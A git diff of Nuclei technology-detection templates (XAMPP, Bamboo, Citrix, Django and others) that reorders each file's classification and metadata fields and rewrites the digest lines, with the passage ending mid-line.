a/http/technologies/apache/xampp-default-page.yaml b/http/technologies/apache/xampp-default-page.yaml index bc4c9bc794..682473b183 100644 --- a/http/technologies/apache/xampp-default-page.yaml +++ b/http/technologies/apache/xampp-default-page.yaml @@ -4,15 +4,15 @@ info: name: XAMPP Default Page author: dhiyaneshDK severity: info - metadata: - max-request: 1 - shodan-query: http.title:"XAMPP" - product: xampp - vendor: apachefriends - tags: tech,php,xampp,apache - classification: cpe: cpe:2.3:a:apachefriends:xampp:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: apachefriends + product: xampp + shodan-query: http.title:"XAMPP" + tags: tech,php,xampp,apache + http: - method: GET path: @@ -28,4 +28,4 @@ http: status: - 200 -# digest: 490a0046304402201a60e7f06bc64d280757d677728a5afd38c60886dffa3c12336bd8d805f48d990220519fec34d705203098de9ed37e0d375c02942c0d7973df40b8962a849dc9aece:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402201a60e7f06bc64d280757d677728a5afd38c60886dffa3c12336bd8d805f48d990220519fec34d705203098de9ed37e0d375c02942c0d7973df40b8962a849dc9aece:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/appcms-detect.yaml b/http/technologies/appcms-detect.yaml index 87432ac4fe..922dbe6d34 100644 --- a/http/technologies/appcms-detect.yaml +++ b/http/technologies/appcms-detect.yaml @@ -4,15 +4,15 @@ info: name: AppCms Detect author: princechaddha severity: info - metadata: - max-request: 1 - shodan-query: http.html:"Powerd by AppCMS" - product: appcms - vendor: appcms - tags: tech,appcms - classification: cpe: cpe:2.3:a:appcms:appcms:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: appcms + product: appcms + shodan-query: http.html:"Powerd by AppCMS" + tags: tech,appcms + http: - method: GET path: @@ -36,4 +36,4 @@ http: regex: - '' -# digest: 4a0a004730450220048cb3b4991d02e731d9fce6eea113c4b84e5639f85a867281f1ae48f106f9f8022100e3e48abd4c96c7d584806ba355fb6ac163786e36d4a4768b56c68908ee46e44d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220048cb3b4991d02e731d9fce6eea113c4b84e5639f85a867281f1ae48f106f9f8022100e3e48abd4c96c7d584806ba355fb6ac163786e36d4a4768b56c68908ee46e44d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/autobahn-python-detect.yaml b/http/technologies/autobahn-python-detect.yaml index 1cc2c24c59..8463c2511a 100644 --- a/http/technologies/autobahn-python-detect.yaml +++ b/http/technologies/autobahn-python-detect.yaml @@ -4,15 +4,15 @@ info: name: Autobahn-Python Webserver Detect author: pussycat0x severity: info - metadata: - max-request: 1 - shodan-query: "AutobahnPython" - product: autobahn - vendor: crossbar - tags: tech,webserver - classification: cpe: cpe:2.3:a:crossbar:autobahn:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: crossbar + product: autobahn + shodan-query: "AutobahnPython" + tags: tech,webserver + http: - method: GET path: @@ -34,4 +34,4 @@ http: regex: - 'AutobahnPython([ 0-9.]+)' -# digest: 4a0a004730450220299433f7a72c6c61f07be31feb69fbd48adc66cd0448767c424a96c597a762f7022100cc56d7af729b231f58beaee35f874d397f81497e67985ffb7c2d9c1f74131a56:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220299433f7a72c6c61f07be31feb69fbd48adc66cd0448767c424a96c597a762f7022100cc56d7af729b231f58beaee35f874d397f81497e67985ffb7c2d9c1f74131a56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/avideo-detect.yaml b/http/technologies/avideo-detect.yaml index 8aca9952e5..cc5111548b 100644 --- a/http/technologies/avideo-detect.yaml +++ b/http/technologies/avideo-detect.yaml @@ -4,17 +4,17 @@ info: name: Avideo Detect author: pikpikcu severity: info + classification: + cpe: cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 + vendor: wwbn + product: avideo shodan-query: http.title:"AVideo" fofa-query: "AVideo" - product: avideo - vendor: wwbn tags: tech,avideo - classification: - cpe: cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:* http: - method: GET path: @@ -42,4 +42,4 @@ http: status: - 200 -# digest: 4a0a00473045022100cf44559df8ac7ad08f8773c5424774c8df0edec3ba3f0828d263691c32f7464d02206f3c7f5afe59bc26e4f49303b4893ceb02b31aa4cd6eb8173f7c5e8053c7c16b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100cf44559df8ac7ad08f8773c5424774c8df0edec3ba3f0828d263691c32f7464d02206f3c7f5afe59bc26e4f49303b4893ceb02b31aa4cd6eb8173f7c5e8053c7c16b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/b2b-builder-detect.yaml b/http/technologies/b2b-builder-detect.yaml index f4c634db03..e4c2ac650c 100644 --- a/http/technologies/b2b-builder-detect.yaml +++ b/http/technologies/b2b-builder-detect.yaml @@ -4,15 +4,15 @@ info: name: B2BBuilder Detect author: ffffffff0x severity: info - metadata: - max-request: 1 - fofa-query: app="B2BBuilder" - product: b2b_script - vendor: itechscripts - tags: b2bbuilder,tech - classification: cpe: cpe:2.3:a:itechscripts:b2b_script:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: itechscripts + product: b2b_script + fofa-query: app="B2BBuilder" + tags: b2bbuilder,tech + http: - method: GET path: @@ -34,4 +34,4 @@ http: status: - 200 -# digest: 4a0a0047304502206e39c2d9d069c1dbbdf25da4823110180c1671be18e3991298429ecfd3ded82a022100ec6997de55c32816fded811c825724ac0c87ec5aea7996cf317783cae9b7e926:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502206e39c2d9d069c1dbbdf25da4823110180c1671be18e3991298429ecfd3ded82a022100ec6997de55c32816fded811c825724ac0c87ec5aea7996cf317783cae9b7e926:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/bamboo-detect.yaml b/http/technologies/bamboo-detect.yaml index 26d0671e6b..7d61006e6a 100644 --- a/http/technologies/bamboo-detect.yaml +++ b/http/technologies/bamboo-detect.yaml @@ -6,17 +6,17 @@ info: severity: info description: | Detect the presence of Bamboo, a CI/CD tool. + classification: + cpe: cpe:2.3:a:atlassian:bamboo:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: atlassian + product: bamboo shodan-query: http.favicon.hash:-1379982221 category: devops - product: bamboo tags: tech,bamboo,atlassian,detect,cicd - classification: - cpe: cpe:2.3:a:atlassian:bamboo:*:*:*:*:*:*:*:* http: - method: GET path: @@ -35,4 +35,5 @@ http: group: 1 regex: - '(?i)atlassian bamboo version (.*) -' -# digest: 490a00463044022054fee6be26df8b05fe917fc020a1087009848dc48a25b2df27954e6f1d71ac4802205b3267d31138e786117de003787658c20c23a8956efe95880a085e183df4ab62:922c64590222798bb761d5b6d8e72950 + +# digest: 490a00463044022054fee6be26df8b05fe917fc020a1087009848dc48a25b2df27954e6f1d71ac4802205b3267d31138e786117de003787658c20c23a8956efe95880a085e183df4ab62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/bigbluebutton-detect.yaml b/http/technologies/bigbluebutton-detect.yaml index 5149cf1409..518f0fd894 100644 --- a/http/technologies/bigbluebutton-detect.yaml +++ b/http/technologies/bigbluebutton-detect.yaml @@ -4,15 +4,15 @@ info: name: BigBlueButton Detect author: pikpikcu severity: info - metadata: - max-request: 1 - shodan-query: http.title:"BigBlueButton" - product: bigbluebutton - vendor: bigbluebutton - tags: tech,bigbluebutton - classification: cpe: cpe:2.3:a:bigbluebutton:bigbluebutton:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: bigbluebutton + product: bigbluebutton + shodan-query: http.title:"BigBlueButton" + tags: tech,bigbluebutton + http: - method: GET path: @@ -29,4 +29,4 @@ http: status: - 200 -# digest: 4b0a00483046022100e3bb53afa3cae70ad123439dbdff19f93dc7698770e9987bd76c4569d884558b022100bbe4fa7dc34d384632f8ee70adc8befbb53c7eb502d709f81c30a6b7e107593b:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e3bb53afa3cae70ad123439dbdff19f93dc7698770e9987bd76c4569d884558b022100bbe4fa7dc34d384632f8ee70adc8befbb53c7eb502d709f81c30a6b7e107593b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/bigip-apm-detect.yaml b/http/technologies/bigip-apm-detect.yaml index fc0b213b85..b56d6f8849 100644 --- a/http/technologies/bigip-apm-detect.yaml +++ b/http/technologies/bigip-apm-detect.yaml @@ -6,16 +6,16 @@ info: severity: info reference: - https://my.f5.com/manage/s/article/K000138683 + classification: + cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - shodan-query: html:"BIG-IP APM" - product: big-ip_access_policy_manager vendor: f5 + product: big-ip_access_policy_manager + shodan-query: html:"BIG-IP APM" tags: bigip,tech,f5,detect - classification: - cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:* http: - method: GET path: @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207cd8124890550ff38ab6b1d02a3c17e0c9d6caace23b7b4fa1f0a0c7c1cae777022100d57a340eb62ed44b815752fc532b652b8a782c1dbe959bc4d24254fe212e7053:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502207cd8124890550ff38ab6b1d02a3c17e0c9d6caace23b7b4fa1f0a0c7c1cae777022100d57a340eb62ed44b815752fc532b652b8a782c1dbe959bc4d24254fe212e7053:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/casaos-detection.yaml b/http/technologies/casaos-detection.yaml index b783015182..140db12cfe 100644 --- a/http/technologies/casaos-detection.yaml +++ b/http/technologies/casaos-detection.yaml @@ -6,16 +6,16 @@ info: severity: info reference: - https://github.com/IceWhaleTech/CasaOS - metadata: - max-request: 1 - shodan-query: http.html:"/CasaOS-UI/public/index.html" - fofa-query: body="/CasaOS-UI/public/index.html" - product: casaos - vendor: icewhale - tags: casaos,tech,oss - classification: cpe: cpe:2.3:o:icewhale:casaos:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: icewhale + product: casaos + shodan-query: http.html:"/CasaOS-UI/public/index.html" + fofa-query: body="/CasaOS-UI/public/index.html" + tags: casaos,tech,oss + http: - method: GET path: @@ -32,4 +32,4 @@ http: regex: - CasaOS Version:\s*([0-9.]+) -# digest: 490a004630440220477bd4b3de6e4497c9e589ce0fe9ee5b0053fd63a04b819d1bed73c6bfb3d93602205b0986e3fab04b5edd5c48b3179839a9aa8f3afa6e345ed2aade3838019a3a6e:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220477bd4b3de6e4497c9e589ce0fe9ee5b0053fd63a04b819d1bed73c6bfb3d93602205b0986e3fab04b5edd5c48b3179839a9aa8f3afa6e345ed2aade3838019a3a6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/checkpoint-mobile-detect.yaml b/http/technologies/checkpoint-mobile-detect.yaml index dc31d73f8b..5bbaf7436d 100644 --- a/http/technologies/checkpoint-mobile-detect.yaml +++ b/http/technologies/checkpoint-mobile-detect.yaml @@ -8,16 +8,16 @@ info: Check Point Mobile SSL VPN was detected. reference: - https://www.checkpoint.com/quantum/remote-access-vpn/ + classification: + cpe: cpe:2.3:a:checkpoint:mobile_access_portal_agent:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.html:"Check Point Mobile" - product: mobile_access_portal_agent vendor: checkpoint + product: mobile_access_portal_agent + shodan-query: http.html:"Check Point Mobile" tags: panel,checkpoint,detect - classification: - cpe: cpe:2.3:a:checkpoint:mobile_access_portal_agent:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +37,4 @@ http: status: - 403 -# digest: 4b0a0048304602210096fd8cd25e09a5330a5a44abb2f26ade9700d4445d954f16aaaed67ac566c15f022100f5ad48424d901e210b809d9055b6d2400ce21081e07a55fc8a8fc3bb0a6a2b40:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a0048304602210096fd8cd25e09a5330a5a44abb2f26ade9700d4445d954f16aaaed67ac566c15f022100f5ad48424d901e210b809d9055b6d2400ce21081e07a55fc8a8fc3bb0a6a2b40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/chevereto-detect.yaml b/http/technologies/chevereto-detect.yaml index 56a8aeb450..1553c2a0df 100644 --- a/http/technologies/chevereto-detect.yaml +++ b/http/technologies/chevereto-detect.yaml @@ -4,15 +4,15 @@ info: name: Chevereto detect author: pikpikcu severity: info - metadata: - max-request: 1 - shodan-query: http.title:"Centreon" - product: chevereto - vendor: chevereto - tags: tech,chevereto - classification: cpe: cpe:2.3:a:chevereto:chevereto:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: chevereto + product: chevereto + shodan-query: http.title:"Centreon" + tags: tech,chevereto + http: - method: GET path: @@ -36,4 +36,4 @@ http: regex: - '' -# digest: 4a0a00473045022014a00f02654b7441a62a5487fa97a4dfb2b42b10ff52610250863e802248e946022100bf643ed2a5a696104fc676e749d9b282532168314704a8b8e7d5bd0a52d537da:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022014a00f02654b7441a62a5487fa97a4dfb2b42b10ff52610250863e802248e946022100bf643ed2a5a696104fc676e749d9b282532168314704a8b8e7d5bd0a52d537da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/citrix-hypervisor-page.yaml b/http/technologies/citrix-hypervisor-page.yaml index eb14c6f599..f021fee40d 100644 --- a/http/technologies/citrix-hypervisor-page.yaml +++ b/http/technologies/citrix-hypervisor-page.yaml @@ -4,16 +4,16 @@ info: name: Citrix Hypervisor Page Detection author: pussycat0x severity: info + classification: + cpe: cpe:2.3:o:citrix:hypervisor:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.title:"Welcome to Citrix Hypervisor" - product: hypervisor vendor: citrix + product: hypervisor + shodan-query: http.title:"Welcome to Citrix Hypervisor" tags: tech,citrix,default-page - classification: - cpe: cpe:2.3:o:citrix:hypervisor:*:*:*:*:*:*:*:* http: - method: GET path: @@ -39,4 +39,4 @@ http: regex: - "Welcome to Citrix Hypervisor ([0-9. ]+)" -# digest: 4a0a00473045022100d197a97e2c344aac1af60be5ac7fb0c409e62af9605e39e8f80f2d443929894202200e1931019b121c5c772c78bd5de7c1e664be0a005b6cdc5e91aeffff27d254d7:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d197a97e2c344aac1af60be5ac7fb0c409e62af9605e39e8f80f2d443929894202200e1931019b121c5c772c78bd5de7c1e664be0a005b6cdc5e91aeffff27d254d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/citrix-xenmobile-version.yaml b/http/technologies/citrix-xenmobile-version.yaml index 5ea6e0b03d..607f43f787 100644 --- a/http/technologies/citrix-xenmobile-version.yaml +++ b/http/technologies/citrix-xenmobile-version.yaml @@ -6,16 +6,15 @@ info: severity: info description: | Template for XenMobile-detection (even if login-page is deactivated) and the specific version and rolling patch from js/app/init.js endpoint + classification: + cpe: cpe:2.3:a:citrix:xenmobile_server:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - shodan-query: "title:\"XenMobile - Console\"" - product: xenmobile_server vendor: citrix + product: xenmobile_server + shodan-query: "title:\"XenMobile - Console\"" tags: tech,edb,citrix,version,detect - - classification: - cpe: cpe:2.3:a:citrix:xenmobile_server:*:*:*:*:*:*:*:* flow: http(1) && http(2) http: @@ -53,4 +52,5 @@ http: group: 1 regex: - 'v=([^"]+)' -# digest: 4a0a00473045022100c40bea9cbdb42f2cf6c1b737a80bb2c695f0c77d720adbb6001c3acdb534e74002207275f0e0528ef6bac4cd2ac049c3a16605635c2ac0ee65b2efc725abedc44bf9:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100c40bea9cbdb42f2cf6c1b737a80bb2c695f0c77d720adbb6001c3acdb534e74002207275f0e0528ef6bac4cd2ac049c3a16605635c2ac0ee65b2efc725abedc44bf9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/connectwise-control-detect.yaml b/http/technologies/connectwise-control-detect.yaml index 37c8c9cc08..161d89e729 100644 --- a/http/technologies/connectwise-control-detect.yaml +++ b/http/technologies/connectwise-control-detect.yaml @@ -4,16 +4,16 @@ info: name: ConnectWise Control Detect author: pikpikcu severity: info + classification: + cpe: cpe:2.3:a:connectwise:control:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title="ConnectWise Control Remote Support Software" - product: control vendor: connectwise + product: control + shodan-query: title="ConnectWise Control Remote Support Software" tags: tech,connectwise - classification: - cpe: cpe:2.3:a:connectwise:control:*:*:*:*:*:*:*:* http: - method: GET path: @@ -30,4 +30,4 @@ http: status: - 200 -# digest: 490a0046304402202f654d62f5cfb6f1a4952af8b0dc128d2864a61d733916645d0bc2bc8295951a02203fab760e024e86d37d64c3822ce3d9d5310f96e749fb5b84060bbdf658aebb4e:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202f654d62f5cfb6f1a4952af8b0dc128d2864a61d733916645d0bc2bc8295951a02203fab760e024e86d37d64c3822ce3d9d5310f96e749fb5b84060bbdf658aebb4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/couchbase-sync-gateway.yaml b/http/technologies/couchbase-sync-gateway.yaml index 605a41bca5..a291b360a4 100644 --- a/http/technologies/couchbase-sync-gateway.yaml +++ b/http/technologies/couchbase-sync-gateway.yaml @@ -4,15 +4,15 @@ info: name: Couchbase Sync Gateway author: dhiyaneshDk severity: info - metadata: - max-request: 1 - shodan-query: html:"Couchbase Sync Gateway" - product: sync_gateway - vendor: couchbase - tags: tech,couchbase - classification: cpe: cpe:2.3:a:couchbase:sync_gateway:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: couchbase + product: sync_gateway + shodan-query: html:"Couchbase Sync Gateway" + tags: tech,couchbase + http: - method: GET path: @@ -38,4 +38,4 @@ http: regex: - 'version":"Couchbase Sync Gateway\/([0-9.(;a-z)]+)' -# digest: 4a0a0047304502200722734c2751dbf6947e94e9dc7e612e74069bf0d4d50fa3408f4692e0a412e4022100a38f3c41a249e9ea9502862e64aab6c906887ee0efbf1d56d15df56b321e2939:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502200722734c2751dbf6947e94e9dc7e612e74069bf0d4d50fa3408f4692e0a412e4022100a38f3c41a249e9ea9502862e64aab6c906887ee0efbf1d56d15df56b321e2939:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/craftercms-detect.yaml b/http/technologies/craftercms-detect.yaml index d1281aefae..e7a636b424 100644 --- a/http/technologies/craftercms-detect.yaml +++ b/http/technologies/craftercms-detect.yaml @@ -8,16 +8,16 @@ info: CrafterCMS was detected. reference: - https://craftercms.org/ + classification: + cpe: cpe:2.3:a:craftercms:crafter_cms:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.title:"craftercms" - product: crafter_cms vendor: craftercms + product: crafter_cms + shodan-query: http.title:"craftercms" tags: tech,craftercms,detect - classification: - cpe: cpe:2.3:a:craftercms:crafter_cms:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +37,5 @@ http: group: 1 regex: - 'Copyright\s+\(C\)\s+([0-9-]+)\s+Crafter' -# digest: 4b0a00483046022100e458cbb4bdc3e20cec88b73b90c65c423765ccfd6cca34c7dd45072194e4c22a022100ddbef9284a10c6b0f7d5940e7130502f5361cf2deb8483b5755d88dc8e3dda39:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100e458cbb4bdc3e20cec88b73b90c65c423765ccfd6cca34c7dd45072194e4c22a022100ddbef9284a10c6b0f7d5940e7130502f5361cf2deb8483b5755d88dc8e3dda39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/cvsweb-detect.yaml b/http/technologies/cvsweb-detect.yaml index 9625f9eaf2..6389c3cefc 100644 --- a/http/technologies/cvsweb-detect.yaml +++ b/http/technologies/cvsweb-detect.yaml @@ -8,18 +8,18 @@ info: CVSweb is a WWW interface for CVS repositories with which you can browse a file hierarchy on your browser to view each file's revision history in a very handy manner. reference: - https://cvsweb.openbsd.org/ + classification: + cpe: cpe:2.3:a:freebsd:cvsweb:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 + vendor: freebsd + product: cvsweb shodan-query: title:"cvsweb" fofa-query: title="cvsweb" zoomeye-query: title:cvsweb - product: cvsweb - vendor: freebsd tags: tech,cvsweb,detect - classification: - cpe: cpe:2.3:a:freebsd:cvsweb:*:*:*:*:*:*:*:* http: - method: GET path: @@ -46,4 +46,4 @@ http: regex: - 'content=".*CVSweb\s*([0-9.]+)"' -# digest: 490a0046304402205edaaf4869f5e99128f50d300e222b62e3ff929787c084f7271cd034d9b450f502201f253ad5141e8777d354f91ae7cbe61e6a7d08b2a944d9c2cd1b5e30c6ca3b01:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402205edaaf4869f5e99128f50d300e222b62e3ff929787c084f7271cd034d9b450f502201f253ad5141e8777d354f91ae7cbe61e6a7d08b2a944d9c2cd1b5e30c6ca3b01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/dash-panel-detect.yaml b/http/technologies/dash-panel-detect.yaml index 10ceca67b9..292df5db8f 100644 --- a/http/technologies/dash-panel-detect.yaml +++ b/http/technologies/dash-panel-detect.yaml @@ -4,16 +4,16 @@ info: name: Dash Panel Detect author: tess severity: info + classification: + cpe: cpe:2.3:a:dash:dash_core:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"DashRenderer" - product: dash_core vendor: dash + product: dash_core + shodan-query: html:"DashRenderer" tags: tech,dash - classification: - cpe: cpe:2.3:a:dash:dash_core:*:*:*:*:*:*:*:* http: - method: GET path: @@ -35,4 +35,4 @@ http: status: - 200 -# digest: 4a0a004730450220618eee2206cff4acc4a9f531eeadf6ef701dc62ba06109659ce044ca84e6e89f022100c0565b9f844f47b4ea79e0b021942c93aa9b76ae28abc4e31e65fa7973c3a922:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220618eee2206cff4acc4a9f531eeadf6ef701dc62ba06109659ce044ca84e6e89f022100c0565b9f844f47b4ea79e0b021942c93aa9b76ae28abc4e31e65fa7973c3a922:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/dedecms-detect.yaml b/http/technologies/dedecms-detect.yaml index aa51d9a71a..01ed2503df 100644 --- a/http/technologies/dedecms-detect.yaml +++ b/http/technologies/dedecms-detect.yaml @@ -4,16 +4,16 @@ info: name: DedeCMS Detect author: ritikchaddha,pphuahua severity: info + classification: + cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - shodan-query: title:"dedecms" || http.html:"power by dedecms" - product: dedecms vendor: dedecms + product: dedecms + shodan-query: title:"dedecms" || http.html:"power by dedecms" tags: dedecms,tech - classification: - cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +31,4 @@ http: - "status_code_2 == 200 && contains(body_2,'/plus/search.php')" condition: or -# digest: 4b0a00483046022100f2a254d9ca7e339d5f133823a68672e98e10238ed6271f38f42563f25ffc529a022100c9dde7ff33c0bd678edb3ffb20f2cd78c50c43dc9604c78f8a7a3bbfe014f3a3:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f2a254d9ca7e339d5f133823a68672e98e10238ed6271f38f42563f25ffc529a022100c9dde7ff33c0bd678edb3ffb20f2cd78c50c43dc9604c78f8a7a3bbfe014f3a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/default-apache-shiro.yaml b/http/technologies/default-apache-shiro.yaml index cd23f7f24e..883007a851 100644 --- a/http/technologies/default-apache-shiro.yaml +++ b/http/technologies/default-apache-shiro.yaml @@ -4,16 +4,16 @@ info: name: Apache Shiro Default Page author: DhiyaneshDK severity: info + classification: + cpe: cpe:2.3:a:apache:shiro:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Apache Shiro Quickstart" - product: shiro vendor: apache + product: shiro + shodan-query: title:"Apache Shiro Quickstart" tags: tech,apache,shiro - classification: - cpe: cpe:2.3:a:apache:shiro:*:*:*:*:*:*:*:* http: - method: GET path: @@ -30,4 +30,4 @@ http: status: - 200 -# digest: 490a0046304402206679e43f4e2125fa6ab7f37680f2c0464b2b7251690168259de5ac9c1f18fb51022071a731cd2862bb734edb2e7491f15198961599fa7ed8cb84bfa49805b92df0f3:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206679e43f4e2125fa6ab7f37680f2c0464b2b7251690168259de5ac9c1f18fb51022071a731cd2862bb734edb2e7491f15198961599fa7ed8cb84bfa49805b92df0f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/default-cakephp-page.yaml b/http/technologies/default-cakephp-page.yaml index 1ae6dc709e..a17420c40a 100644 --- a/http/technologies/default-cakephp-page.yaml +++ b/http/technologies/default-cakephp-page.yaml @@ -4,16 +4,16 @@ info: name: CakePHP Default Page author: DhiyaneshDK severity: info + classification: + cpe: cpe:2.3:a:cakephp:cakephp:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"Welcome to CakePHP" - product: cakephp vendor: cakephp + product: cakephp + shodan-query: html:"Welcome to CakePHP" tags: tech,cakephp,default-page - classification: - cpe: cpe:2.3:a:cakephp:cakephp:*:*:*:*:*:*:*:* http: - method: GET path: @@ -39,4 +39,4 @@ http: regex: - "Welcome to CakePHP ([0-9.]+)" -# digest: 4a0a00473045022100b3fe3a8d266ae3117251f52714d20b8333c07aba389daafb73668f303f7c83b8022039b1f0c99bc6e24b20fbfd6fb88ed88498441437586c45ed69a6ccd4c10ef795:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b3fe3a8d266ae3117251f52714d20b8333c07aba389daafb73668f303f7c83b8022039b1f0c99bc6e24b20fbfd6fb88ed88498441437586c45ed69a6ccd4c10ef795:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/default-codeigniter-page.yaml b/http/technologies/default-codeigniter-page.yaml index fdff67ed7b..f8c200d469 100644 --- a/http/technologies/default-codeigniter-page.yaml +++ b/http/technologies/default-codeigniter-page.yaml @@ -4,15 +4,15 @@ info: name: Default CodeIgniter Page author: dhiyaneshDK severity: info - metadata: - max-request: 1 - shodan-query: http.title:"Welcome to CodeIgniter" - product: codeigniter - vendor: codeigniter - tags: tech,codeigniter - classification: cpe: cpe:2.3:a:codeigniter:codeigniter:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: codeigniter + product: codeigniter + shodan-query: http.title:"Welcome to CodeIgniter" + tags: tech,codeigniter + http: - method: GET path: @@ -28,4 +28,4 @@ http: status: - 200 -# digest: 4b0a00483046022100f4e992a459c52b2e15d4e202219faf801f3d82e1c31c798c6a400d7f923c0ee502210096d6440219750e02b3176cbaf2e33f06598297f784355801a904c26295e486fa:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f4e992a459c52b2e15d4e202219faf801f3d82e1c31c798c6a400d7f923c0ee502210096d6440219750e02b3176cbaf2e33f06598297f784355801a904c26295e486fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/default-django-page.yaml b/http/technologies/default-django-page.yaml index 6218f685ba..71faf8db35 100644 --- a/http/technologies/default-django-page.yaml +++ b/http/technologies/default-django-page.yaml @@ -4,15 +4,15 @@ info: name: Django Default Page author: dhiyaneshDk severity: info - metadata: - max-request: 1 - shodan-query: http.title:"The install worked successfully! Congratulations!" - product: django - vendor: djangoproject - tags: tech,django - classification: cpe: cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: djangoproject + product: django + shodan-query: http.title:"The install worked successfully! Congratulations!" + tags: tech,django + http: - method: GET path: @@ -24,4 +24,4 @@ http: - "The install worked successfully! Congratulations!" part: body -# digest: 4a0a00473045022100d8691337604d9ceebf998734906c8ff1cb8c8541377a7d21b71796c9ad1118340220626b095cab5aeeb6bb0e9e02a88bdfe1d7d2eae9684c262b9bac96aeb146b222:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d8691337604d9ceebf998734906c8ff1cb8c8541377a7d21b71796c9ad1118340220626b095cab5aeeb6bb0e9e02a88bdfe1d7d2eae9684c262b9bac96aeb146b222:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/default-fastcgi-page.yaml b/http/technologies/default-fastcgi-page.yaml index 3253bcd23e..8c32536721 100644 --- a/http/technologies/default-fastcgi-page.yaml +++ b/http/technologies/default-fastcgi-page.yaml @@ -4,15 +4,15 @@ info: name: Fastcgi Default Test Page author: dhiyaneshDk severity: info - metadata: - max-request: 1 - shodan-query: http.title:"FastCGI" - product: fcgi - vendor: fastcgi - tags: tech,fastcgi - classification: cpe: cpe:2.3:a:fastcgi:fcgi:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: fastcgi + product: fcgi + shodan-query: http.title:"FastCGI" + tags: tech,fastcgi + http: - method: GET path: @@ -24,4 +24,4 @@ http: - "TurnKey NGINX PHP FastCGI Server" part: body -# digest: 